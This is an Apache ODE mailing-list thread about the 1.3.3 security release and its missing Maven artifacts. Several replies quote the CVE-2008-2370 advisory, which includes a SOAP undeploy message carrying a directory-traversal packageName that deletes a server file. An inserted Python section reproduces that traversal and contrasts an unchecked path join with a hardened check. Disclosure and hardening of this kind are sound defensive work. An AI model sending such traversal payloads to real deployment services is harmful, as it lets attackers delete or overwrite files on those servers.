Posted to dev@ode.apache.org by "Nowakowski, Mateusz" <Ma...@sabre-holdings.com> on 2009/08/17 11:20:54 UTC

No Apache ODE 1.3.3 in Maven repos

Is it so difficult to populate the newest ODE to maven repos?
:)

-- 
Regards
Mateusz Nowakowski

-----Original Message-----
From: Nowakowski, Mateusz [mailto:Mateusz.Nowakowski@sabre-holdings.com] 
Sent: Thursday, August 13, 2009 10:22 AM
To: dev@ode.apache.org; user@ode.apache.org
Subject: RE: [ANNOUNCE] Apache ODE 1.3.3

Any update on that?

I'm trying to find for example ODE 1.3.3 here:
http://repo1.maven.org/maven2/org/apache/ode/ode-jbi/
but the newest version is 1.3.2.

-- 
Regards
Mateusz Nowakowski
-----Original Message-----
From: Nowakowski, Mateusz [mailto:Mateusz.Nowakowski@sabre-holdings.com] 
Sent: Tuesday, August 11, 2009 5:32 PM
To: dev@ode.apache.org
Subject: RE: [ANNOUNCE] Apache ODE 1.3.3 - 

Hi,

I couldn't find ODE 1.3.3 in the main maven repository.
Could you place it there?

Thanks

-- 
Regards
Mateusz Nowakowski

-----Original Message-----
From: matthieu.riou@gmail.com [mailto:matthieu.riou@gmail.com] On Behalf Of Matthieu Riou
Sent: Saturday, August 08, 2009 6:41 AM
To: security@apache.org; full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com; dev@ode.apache.org; user@ode.apache.org; Marc Schoenefeld; announce@apache.org
Subject: [ANNOUNCE] Apache ODE 1.3.3

Hi,

I'm pleased to announce the release of ODE 1.3.3, a security release of
Apache ODE. It fixes a vulnerability in the process deployment that allowed,
using a forged message, the creation, overwriting or deletion of files on the
server file system. See the full vulnerability announcement below.

Apache ODE is a WS-BPEL compliant web service orchestration engine. It
organizes web services calls following a process description written in the
BPEL XML grammar. Another way to describe it would be a web-service capable
workflow engine.

This new release also includes new features, bug fixes and improvements. See
the release notes for an exhaustive list:
https://issues.apache.org/jira/browse/ODE/fixforversion/12313906

For more information, check the Apache ODE website:
http://ode.apache.org/

Apache ODE is an open source project released under a business-friendly
license (Apache License v2.0), as such we welcome your help and
contributions. To participate and get involved, our mailing lists are the
best resources to start from:
http://ode.apache.org/mailing-lists.html

Thank you,
The Apache ODE Team

------

CVE-2008-2370: Apache ODE information disclosure vulnerability

Severity: Medium

Vendor: The Apache Software Foundation

Versions Affected: ODE 1.0-incubating to ODE 1.3.2. The unsupported ODE
2.0-beta1 and 2.0-beta2 are also affected.

Description: The process deployment web service was sensitive to deployment
messages with forged names. Using a path for the name allowed directory
traversal, resulting in the potential writing of files under unwanted
locations (like a new WAR under a webapp deployment directory), the
overwriting of existing files or their deletion.

Mitigation: 1.x users should upgrade to 1.3.3. 2.0-betaX users should obtain
the latest source from svn or apply the patch published under
http://people.apache.org/~mriou/CVE-2008-2370-patch.txt


Example: Deleting a file /tmp/blabla using undeploy by sending the following
message to the deployment service:

<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:pmap="http://www.apache.org/ode/pmapi">
  <soapenv:Header/>
  <soapenv:Body>
     <pmap:undeploy>
        <packageName>../../../../../../../../../../../../../../tmp/blabla</packageName>
     </pmap:undeploy>
  </soapenv:Body>
</soapenv:Envelope>

Credit: This issue was discovered by Marc Schoenefeld of Red Hat.
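
Added example (not ODE's code and not part of this thread): the deployment-service traversal that the quoted advisory describes, reproduced offline in Python. The packageName from the advisory's undeploy message is joined onto an assumed deployment directory (/opt/ode/deploy, an assumption, not ODE's configured location) in two ways: the unchecked join the advisory describes, and a hardened check that accepts only a single path component whose resolved target is a direct child of that directory. Both SOAP messages are constructed samples, not captured traffic, and the handler only computes the target path; it never touches disk.

```python
import os
import xml.etree.ElementTree as ET
from pathlib import Path

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
PMAPI_NS = "http://www.apache.org/ode/pmapi"

# Assumed deployment directory; ODE's real location is configured per install.
DEPLOY_DIR = "/opt/ode/deploy"

# Constructed sample messages (not captured traffic). The first reproduces the
# traversal packageName from the advisory; the second names an ordinary package.
TRAVERSAL_MSG = """<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:pmap="http://www.apache.org/ode/pmapi">
  <soapenv:Header/>
  <soapenv:Body>
    <pmap:undeploy>
      <packageName>../../../../../../../../../../../../../../tmp/blabla</packageName>
    </pmap:undeploy>
  </soapenv:Body>
</soapenv:Envelope>"""

BENIGN_MSG = TRAVERSAL_MSG.replace(
    "../../../../../../../../../../../../../../tmp/blabla", "HelloWorld-1")


def extract_package_name(soap_xml: str) -> str:
    """Pull packageName out of a pmapi undeploy request."""
    root = ET.fromstring(soap_xml)
    body = root.find(f"{{{SOAP_NS}}}Body")
    op = body.find(f"{{{PMAPI_NS}}}undeploy") if body is not None else None
    if op is None:
        raise ValueError("no pmapi:undeploy in SOAP Body")
    # packageName is unqualified in the advisory's message (no default namespace).
    name = op.find("packageName")
    if name is None or not name.text:
        raise ValueError("missing packageName")
    return name.text.strip()


def unsafe_target(deploy_dir: str, package_name: str) -> Path:
    """The pattern the advisory describes: the client-supplied name is joined
    onto the deployment directory unchecked, so '..' segments walk out of it."""
    return Path(os.path.normpath(os.path.join(deploy_dir, package_name)))


def safe_target(deploy_dir: str, package_name: str) -> Path:
    """Hardened form: the name must be a single path component, and the
    resolved target must be a direct child of the deployment directory."""
    if package_name in ("", ".", ".."):
        raise ValueError(f"invalid package name {package_name!r}")
    if any(c in package_name for c in "/\\\x00"):
        raise ValueError(f"package name contains a separator or NUL: {package_name!r}")
    base = Path(deploy_dir).resolve()
    # resolve() follows symlinks too, so a link planted under the deploy
    # directory cannot redirect the delete elsewhere either.
    target = (base / package_name).resolve()
    if target.parent != base:
        raise ValueError(f"{package_name!r} resolves outside {base}")
    return target


def package_name_ok(deploy_dir: str, package_name: str) -> bool:
    """True if safe_target() accepts the name."""
    try:
        safe_target(deploy_dir, package_name)
        return True
    except ValueError:
        return False


def handle_undeploy(soap_xml: str, deploy_dir: str = DEPLOY_DIR) -> tuple:
    """Validate an undeploy request without touching disk.
    Returns ("ok", target_path) or ("rejected", reason)."""
    name = extract_package_name(soap_xml)
    try:
        return ("ok", str(safe_target(deploy_dir, name)))
    except ValueError as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    for msg in (TRAVERSAL_MSG, BENIGN_MSG):
        name = extract_package_name(msg)
        print(f"packageName={name!r}")
        print(f"  unchecked join -> {unsafe_target(DEPLOY_DIR, name)}")
        print(f"  hardened check -> {handle_undeploy(msg)}")
```

The separator check alone is what stops the advisory's message; the resolve()-and-parent check is the second layer for names that get past it, such as a symlink planted under the deployment directory. As a side effect the hardened check refuses to undeploy a package whose directory is itself a symlink, which is the conservative choice for a service that deletes files.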

RE: No Apache ODE 1.3.3 in Maven repos

Posted by "Nowakowski, Mateusz" <Ma...@sabre-holdings.com>.
Thanks!

-- 
Regards
Mateusz Nowakowski
-----Original Message-----
From: Matthieu Riou [mailto:matthieu.riou@gmail.com] 
Sent: Tuesday, August 18, 2009 6:15 PM
To: dev@ode.apache.org
Cc: user@ode.apache.org
Subject: Re: No Apache ODE 1.3.3 in Maven repos

On Mon, Aug 17, 2009 at 7:17 AM, Matthieu Riou <ma...@gmail.com> wrote:

> On Mon, Aug 17, 2009 at 2:20 AM, Nowakowski, Mateusz <
> Mateusz.Nowakowski@sabre-holdings.com> wrote:
>
>> Is it so difficult to populate the newest ODE to maven repos?
>> :)
>>
>
> Ah sorry, it's not difficult, I just need some time to do it. Hopefully
> later today.
>

It's uploaded and mirrored now:

http://repo1.maven.org/maven2/org/apache/ode/


>
> Matthieu
>
>
>>
>> --
>>
>> Regards
>> Mateusz Nowakowski
>>
>> -----Original Message-----
>> From: Nowakowski, Mateusz [mailto:Mateusz.Nowakowski@sabre-holdings.com]
>> Sent: Thursday, August 13, 2009 10:22 AM
>> To: dev@ode.apache.org; user@ode.apache.org
>> Subject: RE: [ANNOUNCE] Apache ODE 1.3.3
>>
>> Any update on that?
>>
>> I'm trying to find for example ODE 1.3.3 here:
>> http://repo1.maven.org/maven2/org/apache/ode/ode-jbi/
>> but the newest version is 1.3.2.
>>
>> --
>> Regards
>> Mateusz Nowakowski
>> -----Original Message-----
>> From: Nowakowski, Mateusz [mailto:Mateusz.Nowakowski@sabre-holdings.com]
>> Sent: Tuesday, August 11, 2009 5:32 PM
>> To: dev@ode.apache.org
>> Subject: RE: [ANNOUNCE] Apache ODE 1.3.3 -
>>
>> Hi,
>>
>> I couldn't find ODE 1.3.3 in the main maven repository.
>> Could you place it there?
>>
>> Thanks
>>
>> --
>> Regards
>> Mateusz Nowakowski
>>
>> -----Original Message-----
>> From: matthieu.riou@gmail.com [mailto:matthieu.riou@gmail.com] On Behalf
>> Of Matthieu Riou
>> Sent: Saturday, August 08, 2009 6:41 AM
>> To: security@apache.org; full-disclosure@lists.grok.org.uk;
>> bugtraq@securityfocus.com; dev@ode.apache.org; user@ode.apache.org; Marc
>> Schoenefeld; announce@apache.org
>> Subject: [ANNOUNCE] Apache ODE 1.3.3
>>
>> Hi,
>>
>> I'm pleased to announce the release of ODE 1.3.3, a security release of
>> Apache ODE. It fixes a vulnerability in the process deployment that
>> allowed, using a forged message, the creation, overwriting or deletion of
>> files on the server file system. See the full vulnerability announcement below.
>>
>> Apache ODE is a WS-BPEL compliant web service orchestration engine. It
>> organizes web services calls following a process description written in
>> the
>> BPEL XML grammar. Another way to describe it would be a web-service
>> capable
>> workflow engine.
>>
>> This new release also includes new features, bug fixes and improvements.
>> See the release notes for an exhaustive list:
>> https://issues.apache.org/jira/browse/ODE/fixforversion/12313906
>>
>> For more information, check the Apache ODE website:
>> http://ode.apache.org/
>>
>> Apache ODE is an open source project released under a business-friendly
>> license (Apache License v2.0), as such we welcome your help and
>> contributions. To participate and get involved, our mailing lists are the
>> best resources to start from:
>> http://ode.apache.org/mailing-lists.html
>>
>> Thank you,
>> The Apache ODE Team
>>
>> ------
>>
>> CVE-2008-2370: Apache ODE information disclosure vulnerability
>>
>> Severity: Medium
>>
>> Vendor: The Apache Software Foundation
>>
>> Versions Affected: ODE 1.0-incubating to ODE 1.3.2. The unsupported ODE
>> 2.0-beta1 and 2.0-beta2 are also affected.
>>
>> Description: The process deployment web service was sensitive to deployment
>> messages with forged names. Using a path for the name allowed directory
>> traversal, resulting in the potential writing of files under unwanted
>> locations (like a new WAR under a webapp deployment directory), the
>> overwriting of existing files or their deletion.
>>
>> Mitigation: 1.x users should upgrade to 1.3.3. 2.0-betaX users should
>> obtain
>> the latest source from svn or apply the patch published under
>> http://people.apache.org/~mriou/CVE-2008-2370-patch.txt
>>
>>
>> Example: Deleting a file /tmp/blabla using undeploy by sending the
>> following
>> message to the deployment service:
>>
>> <?xml version="1.0" encoding="UTF-8"?>
>> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
>> xmlns:pmap="http://www.apache.org/ode/pmapi">
>>   <soapenv:Header/>
>>   <soapenv:Body>
>>      <pmap:undeploy>
>>         <packageName>../../../../../../../../../../../../../../tmp/blabla</packageName>
>>      </pmap:undeploy>
>>   </soapenv:Body>
>> </soapenv:Envelope>
>>
>> Credit: This issue was discovered by Marc Schoenefeld of Red Hat.
>>
>
>

Re: No svn tag for ODE 1.3.3

Posted by Alex Boisvert <bo...@intalio.com>.
I just fixed both.

alex

On Wed, Aug 19, 2009 at 8:30 AM, Nowakowski, Mateusz <
Mateusz.Nowakowski@sabre-holdings.com> wrote:

> I'll tried to download a svn tag for ODE 1.3.3, but I couldn't find it.
> It isn't here:
> http://svn.apache.org/repos/asf/ode/tags/APACHE_ODE_1.3.3
>
> What is more JIRA says that ODE 1.3.3 is not a released version.
>
> --
> Regards
> Mateusz Nowakowski
>

No svn tag for ODE 1.3.3

Posted by "Nowakowski, Mateusz" <Ma...@sabre-holdings.com>.
I tried to download an svn tag for ODE 1.3.3, but I couldn't find it.
It isn't here:
http://svn.apache.org/repos/asf/ode/tags/APACHE_ODE_1.3.3

What is more JIRA says that ODE 1.3.3 is not a released version.

-- 
Regards
Mateusz Nowakowski

Re: No Apache ODE 1.3.3 in Maven repos

Posted by Matthieu Riou <ma...@gmail.com>.
On Mon, Aug 17, 2009 at 7:17 AM, Matthieu Riou <ma...@gmail.com> wrote:

> On Mon, Aug 17, 2009 at 2:20 AM, Nowakowski, Mateusz <
> Mateusz.Nowakowski@sabre-holdings.com> wrote:
>
>> Is it so difficult to populate the newest ODE to maven repos?
>> :)
>>
>
> Ah sorry, it's not difficult, I just need some time to do it. Hopefully
> later today.
>

It's uploaded and mirrored now:

http://repo1.maven.org/maven2/org/apache/ode/


>
> Matthieu
>
>
>>
>> --
>>
>> Regards
>> Mateusz Nowakowski
>>
>> -----Original Message-----
>> From: Nowakowski, Mateusz [mailto:Mateusz.Nowakowski@sabre-holdings.com]
>> Sent: Thursday, August 13, 2009 10:22 AM
>> To: dev@ode.apache.org; user@ode.apache.org
>> Subject: RE: [ANNOUNCE] Apache ODE 1.3.3
>>
>> Any update on that?
>>
>> I'm trying to find for example ODE 1.3.3 here:
>> http://repo1.maven.org/maven2/org/apache/ode/ode-jbi/
>> but the newest version is 1.3.2.
>>
>> --
>> Regards
>> Mateusz Nowakowski
>> -----Original Message-----
>> From: Nowakowski, Mateusz [mailto:Mateusz.Nowakowski@sabre-holdings.com]
>> Sent: Tuesday, August 11, 2009 5:32 PM
>> To: dev@ode.apache.org
>> Subject: RE: [ANNOUNCE] Apache ODE 1.3.3 -
>>
>> Hi,
>>
>> I couldn't find ODE 1.3.3 in the main maven repository.
>> Could you place it there?
>>
>> Thanks
>>
>> --
>> Regards
>> Mateusz Nowakowski
>>
>> -----Original Message-----
>> From: matthieu.riou@gmail.com [mailto:matthieu.riou@gmail.com] On Behalf
>> Of Matthieu Riou
>> Sent: Saturday, August 08, 2009 6:41 AM
>> To: security@apache.org; full-disclosure@lists.grok.org.uk;
>> bugtraq@securityfocus.com; dev@ode.apache.org; user@ode.apache.org; Marc
>> Schoenefeld; announce@apache.org
>> Subject: [ANNOUNCE] Apache ODE 1.3.3
>>
>> Hi,
>>
>> I'm pleased to announce the release of ODE 1.3.3, a security release of
>> Apache ODE. It fixes a vulnerability in the process deployment that
>> allowed, using a forged message, the creation, overwriting or deletion of
>> files on the server file system. See the full vulnerability announcement below.
>>
>> Apache ODE is a WS-BPEL compliant web service orchestration engine. It
>> organizes web services calls following a process description written in
>> the
>> BPEL XML grammar. Another way to describe it would be a web-service
>> capable
>> workflow engine.
>>
>> This new release also includes new features, bug fixes and improvements.
>> See the release notes for an exhaustive list:
>> https://issues.apache.org/jira/browse/ODE/fixforversion/12313906
>>
>> For more information, check the Apache ODE website:
>> http://ode.apache.org/
>>
>> Apache ODE is an open source project released under a business-friendly
>> license (Apache License v2.0), as such we welcome your help and
>> contributions. To participate and get involved, our mailing lists are the
>> best resources to start from:
>> http://ode.apache.org/mailing-lists.html
>>
>> Thank you,
>> The Apache ODE Team
>>
>> ------
>>
>> CVE-2008-2370: Apache ODE information disclosure vulnerability
>>
>> Severity: Medium
>>
>> Vendor: The Apache Software Foundation
>>
>> Versions Affected: ODE 1.0-incubating to ODE 1.3.2. The unsupported ODE
>> 2.0-beta1 and 2.0-beta2 are also affected.
>>
>> Description: The process deployment web service was sensitive to deployment
>> messages with forged names. Using a path for the name allowed directory
>> traversal, resulting in the potential writing of files under unwanted
>> locations (like a new WAR under a webapp deployment directory), the
>> overwriting of existing files or their deletion.
>>
>> Mitigation: 1.x users should upgrade to 1.3.3. 2.0-betaX users should
>> obtain
>> the latest source from svn or apply the patch published under
>> http://people.apache.org/~mriou/CVE-2008-2370-patch.txt
>>
>>
>> Example: Deleting a file /tmp/blabla using undeploy by sending the
>> following
>> message to the deployment service:
>>
>> <?xml version="1.0" encoding="UTF-8"?>
>> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
>> xmlns:pmap="http://www.apache.org/ode/pmapi">
>>   <soapenv:Header/>
>>   <soapenv:Body>
>>      <pmap:undeploy>
>>         <packageName>../../../../../../../../../../../../../../tmp/blabla</packageName>
>>      </pmap:undeploy>
>>   </soapenv:Body>
>> </soapenv:Envelope>
>>
>> Credit: This issue was discovered by Marc Schoenefeld of Red Hat.
>>
>
>

RE: No Apache ODE 1.3.3 in Maven repos

Posted by "Nowakowski, Mateusz" <Ma...@sabre-holdings.com>.
Thanks!

It took nearly a week to get any answer :)

-- 
Regards
Mateusz Nowakowski

-----Original Message-----
From: Matthieu Riou [mailto:matthieu.riou@gmail.com] 
Sent: Monday, August 17, 2009 4:17 PM
To: dev@ode.apache.org
Cc: user@ode.apache.org
Subject: Re: No Apache ODE 1.3.3 in Maven repos

On Mon, Aug 17, 2009 at 2:20 AM, Nowakowski, Mateusz <
Mateusz.Nowakowski@sabre-holdings.com> wrote:

> Is it so difficult to populate the newest ODE to maven repos?
> :)
>

Ah sorry, it's not difficult, I just need some time to do it. Hopefully
later today.

Matthieu


>
> --
> Regards
> Mateusz Nowakowski
>
> -----Original Message-----
> From: Nowakowski, Mateusz [mailto:Mateusz.Nowakowski@sabre-holdings.com]
> Sent: Thursday, August 13, 2009 10:22 AM
> To: dev@ode.apache.org; user@ode.apache.org
> Subject: RE: [ANNOUNCE] Apache ODE 1.3.3
>
> Any update on that?
>
> I'm trying to find for example ODE 1.3.3 here:
> http://repo1.maven.org/maven2/org/apache/ode/ode-jbi/
> but the newest version is 1.3.2.
>
> --
> Regards
> Mateusz Nowakowski
> -----Original Message-----
> From: Nowakowski, Mateusz [mailto:Mateusz.Nowakowski@sabre-holdings.com]
> Sent: Tuesday, August 11, 2009 5:32 PM
> To: dev@ode.apache.org
> Subject: RE: [ANNOUNCE] Apache ODE 1.3.3 -
>
> Hi,
>
> I couldn't find ODE 1.3.3 in the main maven repository.
> Could you place it there?
>
> Thanks
>
> --
> Regards
> Mateusz Nowakowski
>
> -----Original Message-----
> From: matthieu.riou@gmail.com [mailto:matthieu.riou@gmail.com] On Behalf
> Of Matthieu Riou
> Sent: Saturday, August 08, 2009 6:41 AM
> To: security@apache.org; full-disclosure@lists.grok.org.uk;
> bugtraq@securityfocus.com; dev@ode.apache.org; user@ode.apache.org; Marc
> Schoenefeld; announce@apache.org
> Subject: [ANNOUNCE] Apache ODE 1.3.3
>
> Hi,
>
> I'm pleased to announce the release of ODE 1.3.3, a security release of
> Apache ODE. It fixes a vulnerability in the process deployment that
> allowed, using a forged message, the creation, overwriting or deletion of
> files on the server file system. See the full vulnerability announcement below.
>
> Apache ODE is a WS-BPEL compliant web service orchestration engine. It
> organizes web services calls following a process description written in the
> BPEL XML grammar. Another way to describe it would be a web-service capable
> workflow engine.
>
> This new release also includes new features, bug fixes and improvements.
> See the release notes for an exhaustive list:
> https://issues.apache.org/jira/browse/ODE/fixforversion/12313906
>
> For more information, check the Apache ODE website:
> http://ode.apache.org/
>
> Apache ODE is an open source project released under a business-friendly
> license (Apache License v2.0), as such we welcome your help and
> contributions. To participate and get involved, our mailing lists are the
> best resources to start from:
> http://ode.apache.org/mailing-lists.html
>
> Thank you,
> The Apache ODE Team
>
> ------
>
> CVE-2008-2370: Apache ODE information disclosure vulnerability
>
> Severity: Medium
>
> Vendor: The Apache Software Foundation
>
> Versions Affected: ODE 1.0-incubating to ODE 1.3.2. The unsupported ODE
> 2.0-beta1 and 2.0-beta2 are also affected.
>
> Description: The process deployment web service was sensitive to deployment
> messages with forged names. Using a path for the name allowed directory
> traversal, resulting in the potential writing of files under unwanted
> locations (like a new WAR under a webapp deployment directory), the
> overwriting of existing files or their deletion.
>
> Mitigation: 1.x users should upgrade to 1.3.3. 2.0-betaX users should
> obtain
> the latest source from svn or apply the patch published under
> http://people.apache.org/~mriou/CVE-2008-2370-patch.txt
>
>
> Example: Deleting a file /tmp/blabla using undeploy by sending the
> following
> message to the deployment service:
>
> <?xml version="1.0" encoding="UTF-8"?>
> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
> xmlns:pmap="http://www.apache.org/ode/pmapi">
>   <soapenv:Header/>
>   <soapenv:Body>
>      <pmap:undeploy>
>         <packageName>../../../../../../../../../../../../../../tmp/blabla</packageName>
>      </pmap:undeploy>
>   </soapenv:Body>
> </soapenv:Envelope>
>
> Credit: This issue was discovered by Marc Schoenefeld of Red Hat.
>

RE: No Apache ODE 1.3.3 in Maven repos

Posted by "Nowakowski, Mateusz" <Ma...@sabre-holdings.com>.
Thanks!

I took nearly a week to any answer :)

-- 
Regards
Mateusz Nowakowski

-----Original Message-----
From: Matthieu Riou [mailto:matthieu.riou@gmail.com] 
Sent: Monday, August 17, 2009 4:17 PM
To: dev@ode.apache.org
Cc: user@ode.apache.org
Subject: Re: No Apache ODE 1.3.3 in Maven repos

On Mon, Aug 17, 2009 at 2:20 AM, Nowakowski, Mateusz <
Mateusz.Nowakowski@sabre-holdings.com> wrote:

> Is it so difficult to populate the newest ODE to maven repos?
> :)
>

Ah sorry, it's not difficult, I just need some time to do it. Hopefully
later today.

Matthieu


>
> --
> Regards
> Mateusz Nowakowski
>
> -----Original Message-----
> From: Nowakowski, Mateusz [mailto:Mateusz.Nowakowski@sabre-holdings.com]
> Sent: Thursday, August 13, 2009 10:22 AM
> To: dev@ode.apache.org; user@ode.apache.org
> Subject: RE: [ANNOUNCE] Apache ODE 1.3.3
>
> Any update on that?
>
> I'm trying to find for example ODE 1.3.3 here:
> http://repo1.maven.org/maven2/org/apache/ode/ode-jbi/
> but the newest version is 1.3.2.
>
> --
> Regards
> Mateusz Nowakowski
> -----Original Message-----
> From: Nowakowski, Mateusz [mailto:Mateusz.Nowakowski@sabre-holdings.com]
> Sent: Tuesday, August 11, 2009 5:32 PM
> To: dev@ode.apache.org
> Subject: RE: [ANNOUNCE] Apache ODE 1.3.3 -
>
> Hi,
>
> I couldn't find ODE 1.3.3 in the main maven repository.
> Could you place it there?
>
> Thanks
>
> --
> Regards
> Mateusz Nowakowski
>
> -----Original Message-----
> From: matthieu.riou@gmail.com [mailto:matthieu.riou@gmail.com] On Behalf
> Of Matthieu Riou
> Sent: Saturday, August 08, 2009 6:41 AM
> To: security@apache.org; full-disclosure@lists.grok.org.uk;
> bugtraq@securityfocus.com; dev@ode.apache.org; user@ode.apache.org; Marc
> Schoenefeld; announce@apache.org
> Subject: [ANNOUNCE] Apache ODE 1.3.3
>
> Hi,
>
> I'm pleased to announce the release of ODE 1.3.3, a security release of
> Apache ODE. It fixes a vulnerability in the process deployment that
> allowed,
> using a forged message, to create, overwrite or delete files on the server
> file system. See the full vulnerability announcement below.
>
> Apache ODE is a WS-BPEL compliant web service orchestration engine. It
> organizes web services calls following a process description written in the
> BPEL XML grammar. Another way to describe it would be a web-service capable
> workflow engine.
>
> This new release also includes new features, bug fixes and improvements See
> the release notes for an exhaustive list for
> details.<https://issues.apache.org/jira/browse/ODE/fixforversion/12313906>
>
> For more information, check the Apache ODE website:
> http://ode.apache.org/
>
> Apache ODE is an open source project released under a business-friendly
> license (Apache License v2.0), as such we welcome your help and
> contributions. To participate and get involved, our mailing lists are the
> best resources to start from:
> http://ode.apache.org/mailing-lists.html
>
> Thank you,
> The Apache ODE Team
>
> ------
>
> CVE-2008-2370: Apache ODE information disclosure vulnerability
>
> Severity: Medium
>
> Vendor: The Apache Software Foundation
>
> Versions Affected: ODE 1.0-incubating to ODE 1.3.2. The unsupported ODE
> 2.0-beta1 and 2.0-beta2 are also affected.
>
> Description: The process deployment web service was sensible to deployment
> messages with forged names. Using a path for the name was allowing
> directory
> traversal, resulting in the potential writing of files under unwanted
> locations (like a new WAR under a webapp deployment directory), the
> overwriting of existing files or their deletion.
>
> Mitigation: 1.x users should upgrade to 1.3.3. 2.0-betaX users should
> obtain
> the latest source from svn or apply the patch published under
> http://people.apache.org/~mriou/CVE-2008-2370-patch.txt<http://people.apache.org/%7Emriou/CVE-2008-2370-patch.txt>
> <http://people.apache.org/%7Emriou/CVE-2008-2370-patch.txt>.
>
>
> Example: Deleting a file /tmp/blabla using undeploy by sending the
> following
> message to the deployment service:
>
> <?xml version="1.0" encoding="UTF-8"?>
> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/
> "
> xmlns:pmap="http://www.apache.org/ode/pmapi">
>  <soapenv:Header/>
>  <soapenv:Body>
>     <pmap:undeploy>
>
> <packageName>../../../../../../../../../../../../../../tmp/blabla</packageName>
>     </pmap:undeploy>
>  </soapenv:Body>
> </soapenv:Envelope>
> Credit: This issue was discovered by Marc Schoenefeld of Red Hat.
>

Re: No Apache ODE 1.3.3 in Maven repos

Posted by Matthieu Riou <ma...@gmail.com>.
On Mon, Aug 17, 2009 at 7:17 AM, Matthieu Riou <ma...@gmail.com>wrote:

> On Mon, Aug 17, 2009 at 2:20 AM, Nowakowski, Mateusz <
> Mateusz.Nowakowski@sabre-holdings.com> wrote:
>
>> Is it so difficult to populate the newest ODE to maven repos?
>> :)
>>
>
> Ah sorry, it's not difficult, I just need some time to do it. Hopefully
> later today.
>

It's uploaded and mirrored now:

http://repo1.maven.org/maven2/org/apache/ode/


>
> Matthieu
>
>
>>
>> --
>>
>> Regards
>> Mateusz Nowakowski
>>
>> -----Original Message-----
>> From: Nowakowski, Mateusz [mailto:Mateusz.Nowakowski@sabre-holdings.com]
>> Sent: Thursday, August 13, 2009 10:22 AM
>> To: dev@ode.apache.org; user@ode.apache.org
>> Subject: RE: [ANNOUNCE] Apache ODE 1.3.3
>>
>> Any update on that?
>>
>> I'm trying to find for example ODE 1.3.3 here:
>> http://repo1.maven.org/maven2/org/apache/ode/ode-jbi/
>> but the newest version is 1.3.2.
>>
>> --
>> Regards
>> Mateusz Nowakowski
>> -----Original Message-----
>> From: Nowakowski, Mateusz [mailto:Mateusz.Nowakowski@sabre-holdings.com]
>> Sent: Tuesday, August 11, 2009 5:32 PM
>> To: dev@ode.apache.org
>> Subject: RE: [ANNOUNCE] Apache ODE 1.3.3 -
>>
>> Hi,
>>
>> I couldn't find ODE 1.3.3 in the main maven repository.
>> Could you place it there?
>>
>> Thanks
>>
>> --
>> Regards
>> Mateusz Nowakowski
>>
>> -----Original Message-----
>> From: matthieu.riou@gmail.com [mailto:matthieu.riou@gmail.com] On Behalf
>> Of Matthieu Riou
>> Sent: Saturday, August 08, 2009 6:41 AM
>> To: security@apache.org; full-disclosure@lists.grok.org.uk;
>> bugtraq@securityfocus.com; dev@ode.apache.org; user@ode.apache.org; Marc
>> Schoenefeld; announce@apache.org
>> Subject: [ANNOUNCE] Apache ODE 1.3.3
>>
>> Hi,
>>
>> I'm pleased to announce the release of ODE 1.3.3, a security release of
>> Apache ODE. It fixes a vulnerability in the process deployment that
>> allowed,
>> using a forged message, to create, overwrite or delete files on the server
>> file system. See the full vulnerability announcement below.
>>
>> Apache ODE is a WS-BPEL compliant web service orchestration engine. It
>> organizes web services calls following a process description written in
>> the
>> BPEL XML grammar. Another way to describe it would be a web-service
>> capable
>> workflow engine.
>>
>> This new release also includes new features, bug fixes and improvements
>> See
>> the release notes for an exhaustive list for
>> details.<https://issues.apache.org/jira/browse/ODE/fixforversion/12313906
>> >
>>
>> For more information, check the Apache ODE website:
>> http://ode.apache.org/
>>
>> Apache ODE is an open source project released under a business-friendly
>> license (Apache License v2.0), as such we welcome your help and
>> contributions. To participate and get involved, our mailing lists are the
>> best resources to start from:
>> http://ode.apache.org/mailing-lists.html
>>
>> Thank you,
>> The Apache ODE Team
>>
>> ------
>>
>> CVE-2008-2370: Apache ODE information disclosure vulnerability
>>
>> Severity: Medium
>>
>> Vendor: The Apache Software Foundation
>>
>> Versions Affected: ODE 1.0-incubating to ODE 1.3.2. The unsupported ODE
>> 2.0-beta1 and 2.0-beta2 are also affected.
>>
>> Description: The process deployment web service was sensible to deployment
>> messages with forged names. Using a path for the name was allowing directory
>> traversal, resulting in the potential writing of files under unwanted
>> locations (like a new WAR under a webapp deployment directory), the
>> overwriting of existing files or their deletion.
>>
>> Mitigation: 1.x users should upgrade to 1.3.3. 2.0-betaX users should obtain
>> the latest source from svn or apply the patch published under
>> <http://people.apache.org/~mriou/CVE-2008-2370-patch.txt>.
>>
>>
>> Example: Deleting a file /tmp/blabla using undeploy by sending the following
>> message to the deployment service:
>>
>> <?xml version="1.0" encoding="UTF-8"?>
>> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
>>                   xmlns:pmap="http://www.apache.org/ode/pmapi">
>>  <soapenv:Header/>
>>  <soapenv:Body>
>>     <pmap:undeploy>
>>
>> <packageName>../../../../../../../../../../../../../../tmp/blabla</packageName>
>>     </pmap:undeploy>
>>  </soapenv:Body>
>> </soapenv:Envelope>
>>
>> Credit: This issue was discovered by Marc Schoenefeld of Red Hat.
>>
>
>

Re: No Apache ODE 1.3.3 in Maven repos

Posted by Matthieu Riou <ma...@gmail.com>.
On Mon, Aug 17, 2009 at 2:20 AM, Nowakowski, Mateusz <
Mateusz.Nowakowski@sabre-holdings.com> wrote:

> Is it so difficult to populate the newest ODE to maven repos?
> :)
>

Ah sorry, it's not difficult, I just need some time to do it. Hopefully
later today.

Matthieu


>
> --
> Regards
> Mateusz Nowakowski
>
> -----Original Message-----
> From: Nowakowski, Mateusz [mailto:Mateusz.Nowakowski@sabre-holdings.com]
> Sent: Thursday, August 13, 2009 10:22 AM
> To: dev@ode.apache.org; user@ode.apache.org
> Subject: RE: [ANNOUNCE] Apache ODE 1.3.3
>
> Any update on that?
>
> I'm trying to find for example ODE 1.3.3 here:
> http://repo1.maven.org/maven2/org/apache/ode/ode-jbi/
> but the newest version is 1.3.2.
>
> --
> Regards
